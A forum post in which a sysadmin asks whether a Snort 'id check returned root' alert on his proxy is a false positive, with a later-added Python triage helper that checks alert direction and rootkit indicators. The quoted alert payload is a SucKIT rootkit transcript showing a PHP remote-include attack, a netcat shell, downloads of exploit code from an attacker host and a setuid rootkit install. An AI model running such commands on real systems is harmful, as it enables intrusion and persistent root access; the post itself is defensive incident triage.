I came in this morning and checked my snort alerts (morning routine), and noticed the following:<br>
<br>
ATTACK-RESPONSES id check returned root
2005-10-21
07:40:32
82.165.25.125:80
10.10.10.5:51949
TCP<br>
<br>
Some background. 10.10.10.x is my dmz and 10.10.10.5 is a
firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our
192.168.0.x internal network.<br>
So I started digging around. The alert logged the following:<br>
<br>
SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit *.* <br>
(c)oded by sd@sf.cz &amp; devik@cdi.cz, 2001 <br>
Configuring ./sk:.OK!.[attacker@badass.cz ~/sk10]$ telnet lamehost.com
80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character
is '^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host:
lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52
GMT.Server: Apache/1.3.14 (Unix) (Red-Hat/Linux)
PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ET ag:
&quot;31c6-c2-3bb3ffba&quot;.Content-Type: text/html..IT WERKS!
Shell at port 8193 Connection closed by foreign
host..[attacker@badass.cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com
[192.168.0.2] 8193 (?) open.w.12:08am up 1:20, 3
users, load average: 0.05, 0.06,0.08.USER
TTY FROM
LOGIN@IDLE JCPU PCPU AT.root
tty1 - 11:58pm 39:03
3.15s 2.95s bash.cd /tmp.lynx -dump http://badass.cz/s.c
&gt; s.c.gcc s.c o
super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root)
gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd
.l33t.lynx -dump http://badass.cz/~attacker/sk10/s<br>
k &gt; sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w<br>
<br>
Ok, there are a few things that make me think that this is a false
positive. First is the "192.160.0.02" IP. That is not on
this network. Second, there is no host on 192.168.0.2.
Third, I do not have any Red Hat machines. They are all
Slackware. I am still concerned. I searched for "sk" and
all I found were two directories related to vim, and I didn't find a
directory called "l33t".<br>
<br>
Can anyone help me verify that I wasn't hacked?<br>
<br>
Thanks,<br>
Chris<br>
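A triage helper for the situation in this post, added here as an example and not part of the original thread: it classifies the alert by flow direction (the match came in a reply from port 80 of an external host to an ephemeral port on the proxy, i.e. content the proxy fetched, not a shell answering from inside) and checks a host for the paths named in the captured payload. The internal network ranges, the function names and the "fetched content" interpretation are my assumptions, not the poster's.

```python
# Added triage helper (not from the original post): classifies an
# ATTACK-RESPONSES alert by flow direction and checks a host for the
# filesystem artefacts that the captured payload names.
import ipaddress
import os
import re
import stat

# Paths/names taken from the payload in the alert (the text shows them being
# created); these are what to look for on the proxy host.
PAYLOAD_INDICATORS = {
    "hidden_dir": "usr/local/man/man4/.l33t",
    "dropper_source": "tmp/s.c",
    "setuid_binary": "sk",
}
ROOT_ID_PATTERN = re.compile(r"uid=0\(root\)")  # what the Snort rule keys on


def classify_alert(src, sport, dst, dport, payload, internal_nets):
    """Describe how the rule matched and which way the data flowed.
    A match inside a reply *from* a well-known server port to an internal
    ephemeral port is content the internal host downloaded (a page, tarball
    or README), not a command response from a compromised internal host."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]

    def inside(ip):
        return any(ipaddress.ip_address(ip) in n for n in nets)

    matched = bool(ROOT_ID_PATTERN.search(payload))
    if sport in (80, 443) and not inside(src) and inside(dst):
        direction = "http-response-to-internal-client"
    elif inside(src) and not inside(dst):
        direction = "internal-host-to-external"
    else:
        direction = "other"
    return {"rule_matched": matched, "direction": direction,
            "likely_false_positive": matched and direction == "http-response-to-internal-client"}


def host_indicators(root):
    """Return the indicator keys found under `root` (use root='/' on the suspect
    host): the hidden man4 directory, the dropped source file, and any file
    named 'sk' carrying the setuid bit (the payload shows 'chmod +s+u sk')."""
    found = set()
    if os.path.isdir(os.path.join(root, PAYLOAD_INDICATORS["hidden_dir"])):
        found.add("hidden_dir")
    if os.path.exists(os.path.join(root, PAYLOAD_INDICATORS["dropper_source"])):
        found.add("dropper_source")
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name == PAYLOAD_INDICATORS["setuid_binary"]:
                try:
                    if os.stat(os.path.join(dirpath, name)).st_mode & stat.S_ISUID:
                        found.add("setuid_binary")
                except OSError:
                    pass  # unreadable entries are skipped, not fatal
    return sorted(found)
```

Even when the verdict is "likely false positive", the proxy's access log at the alert time (07:40:32) tells you which client fetched the file that carried the rootkit text, which is the record you want before closing the alert.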